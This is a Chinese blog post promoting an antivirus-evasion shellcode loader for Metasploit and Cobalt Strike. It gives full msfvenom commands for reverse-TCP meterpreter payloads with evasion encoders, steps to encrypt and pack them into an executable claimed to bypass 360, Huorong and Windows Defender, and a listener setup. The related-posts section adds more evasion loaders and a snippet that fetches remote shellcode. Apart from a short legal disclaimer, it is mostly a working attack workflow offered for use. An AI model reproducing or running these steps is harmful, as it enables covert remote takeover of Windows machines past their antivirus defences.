ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

已于 2023-01-20 10:26:47 修改
阅读量2.5k 收藏 12
点赞数 3
分类专栏: 渗透测试工具集合 文章标签: 安全性测试 web安全 安全
于 2022-09-04 23:15:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126674254
版权

ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

文章目录


ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。

一、声明

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!

代码未经过大量测试,如发现问题请提交 issue。

二、测试环境

截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)

Windows 7 64位 或以上操作系统应该都没问题(没有测试)

三、生成Msf_Payload

默认

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f py -o payload.c

XOR 编码器

msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

动态密钥XOR编码器

msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

Zutto Dekiru

msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c

四、生成CobaltStrike_Payload

在这里插入图片描述
选择使用x64的C语言或Python语言的Shellcode。
在这里插入图片描述
得到:payload.c
在这里插入图片描述

五、加密Payload

Shellcode_encryption.exe payload.c
在这里插入图片描述

六、配置ShellCode加载器

将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode’处

示例:
在这里插入图片描述
在这里插入图片描述

七、打包可执行程序(EXE编译环境)

Python 3.8.6

pyinstaller 4.7

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
pyinstaller -F -w ShellCode_Loader.py

生成ShellCode_Loader.exe在dist目录中。

八、上线测试

运行监听

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

在这里插入图片描述
在这里插入图片描述
项目地址:
https://github.com/Axx8/ShellCode_Loader

炫彩@之星
关注
专栏目录
探索Shellcode_Loader:一款高效、灵活的Shellcode加载
gitblog_00002的博客
04-22 702
探索Shellcode_Loader:一款高效、灵活的Shellcode加载 去发现同类优质开源项目:https://gitcode.com/ 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理执行的小型机码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是项目的用武之地。本文将带你深入了解这款工具的功能、技术实现及应用场景。 项目简介 Shel...
7.8(wmi命令+ServiceName+CobaltStrike Loader
m0_72827793的博客
07-08 2752
总体而言,Procexp 是一款功能丰富的任务管理替代工具,用于显示和管理 Windows 系统中的进程、线程、服务和其他系统资源。总的来说,FileMon 是一款功能强大的文件操作监视工具,用于实时监视和记录 Windows 系统中的文件和目录操作。它帮助用户捕获和分析网络上的数据流量,并提供了丰富的功能和工具来理解网络通信、排查故障、评估性能等。总体而言,Procmon 是一款功能强大的进程监视工具,用于实时监视和记录 Windows 系统上的进程活动和系统操作。
网络安全免杀shellcode加载原理(一)笔记
m0_57836225的博客
09-05 1028
在暂存 eip 溢出后,可塞入一段能让 CPU 执行的 shellcode码,使电脑执行攻击者的任意指令。总之,Shellcode 是一种强大的攻击工具,可以通过各种方式生成、调试、混淆和在不同操作系统上执行。然而,使用 Shellcode 进行恶意攻击是非法的行为,我们应该将其用于合法的安全研究和漏洞测试目的。同时,了解 Shellcode 的原理和技术也有助于提高系统的安全性,防范潜在的攻击。例如,以下代码中,evil 数组存储了一段 shellcode,在特定环境下执行后可弹出计算
NimShellCodeLoader:使用nim编写的shellcode加载
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
shellcode弹出对话框
Linux方程式
11-11 3116
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
推荐开源项目:ShellcodeLoader - 高级安全工具,让您的shellcode隐形飞行
gitblog_00065的博客
05-21 337
推荐开源项目:ShellcodeLoader - 高级安全工具,让您的shellcode隐形飞行 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 ShellcodeLoader是一款创新性的开源项目,它采用先进的加密技术和反沙箱策略,使得shellcode(一种在操作系统内存中执行的机码)能在复杂的环境中隐秘运行。通过RSA加密shellcode并动态编译成可执行文件...
免杀笔记 ----> ShellCode Loader !!!
huohaowen的博客
07-05 1687
学了那么久的前置知识,终于到了能上线的地方了!!!不过这里还没到免杀的部分,距离bypass一众的杀毒软件还有很长的路要走!!
cobaltstrikeshellcode免杀
qq_45414878的博客
02-02 1970
本项目是基于学习shellcode原理和免杀基础而编写,利用加密、缩小体积、混淆等方式绕过检测,主要是为了应付火绒和360。
ShellCode-Loader - Msf&CobaltStrike免杀ShellCode加载
最新发布
11-19
转载至GitHub网站https://github.com/Axx8/ShellCode_Loader?tab=readme-ov-file,为不方便去github的朋友提供便利
shellcode加载
10-02
综上所述,这个shellcode加载的组合可能是一个用于渗透测试或研究目的的工具,使用者可以通过Python脚本加载和执行加密过的shellcode,并且可以与Cobalt Strike和Metasploit Framework兼容,提高了在目标系统上...
2024年Python最新【免杀】分离免杀(python)_shellcode loader免杀
2401_84585462的博客
05-01 511
import sysf.close()loader加密
ShellcodeLoader:将shellcode用rsa加密并动态编译exe,自带多个反沙箱技术
03-19
ShellcodeLoadershellcode用rsa加密并动态编译exe,自带多个反沙箱技术。 如果要用.NET 2.0编译请手动编译,csc不支持某些代码 反沙箱 判断父进程是否为调试 判断时间是否加速 一般沙盘内的程序时间都会加速。 判断进程是否有黑名单 判断是不是虚拟机,不过有几个vm进程是本机也会存在的,怕误报可以手动修改黑名单列表。 判断MAC地址是否有黑名单 判断是不是虚拟机的mac地址,有几个地址只要本机有装虚拟机也会有,怕误报可以手动修改黑名单。 判断系统盘是否大于50GB 一个正常的PC的系统盘都会大于50GB。 使用 一般的: 运行生成的exe文件 争论: 程序会保存加密好的数据到Output.txt shellcode.exe“私钥”“加密shellcode” 更新 20200709: 新增x86远程注入(直接复制CACTUSTORCH的) 已知问题 远程
shellcodeloader:shellcodeloader
03-11
ShellcodeLoader 语言: Windows的ShellcodeLoader可以绕过AV。 特征 它具有多种加载模式。 32位有13种加载模式,而64位有12种加载模式。 支持发展。 如果发现新的攻击手段,则可以根据指定的方法开发模板。 Shellcode是自动加密的。来自同一Shellcode加载的md5不同,因为生成使用时间作为种子来随机生成128位密钥进行加密。 待办事项清单 环境:生成使用MFC来实现UI,生成加载模板使用C ++开发,并由VS2015静态编译。 方法:使用vs2015打开项目解决方案(.sln),然后进行编译。当然,您可以从下载产品。 档案文件 该工具由一个生成Shellcodeloader.exe)和许多加载模板组成。 需要将不同的加载模板放置在目录的相应目录中。 最后放在生成相同目录下的DATA文件夹中。 如何使用 打开
ShellcodeLoader:加载shellcode或PE进行分析的小工具
05-18
ShellcodeLoader 构建ShellcodeLoader的目的是在可执行文件的上下文中快速调试在恶意软件分析中提取的Shellcode。 ShelcodeLoader的工作是从磁盘到内存读取一个常规文件,然后跳转到基址或指定的入口点以执行该文件。 它会自动检测是否正在调试,并在执行shellcode之前询问用户是否要设置断点。 在x86和x64系统中工作。 发行版 转到“发行版”选项卡并下载已编译的可执行文件。 用法 该文件是必需的。 其他参数是可选的。 ShellcodeLoader.exe [-e --entrypoint ENTRYPOINT] [-a --address ADDRESS] [-r --run] [-b --break] FILE 加载文件并以指定的偏移量执行代码 ShellcodeLoader.exe -e 1000 shellcodex86.bi
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1632
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
Shellcode加密分离加载MSF与CS支持
Shellcode加载则是用于将shellcode注入到目标进程中,并负责执行这些代码的工具或程序。加载的任务包括但不限于解密、内存分配、权限调整和执行控制权的转移等。 2. 加密分离加载技术 加密分离加载是一种安全...
【护网必备】Windows平台shellcode免杀加载
Fly_鹏程万里
06-14 484
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
shellcodeloader---用于加载bin文件进行调试
xuqi7
09-23 1833
代码摘自《加密与解密》 #include "stdafx.h" #include <Windows.h> int main(int argc, char* argv[]) { HANDLE fp; unsigned char* fBuffer; DWORD fSize, dwSize; fp = CreateFile("Shellcode_bin.bin", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FI
python编写shellcode_python生成shellcode加载
weixin_39763293的博客
12-19 517
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值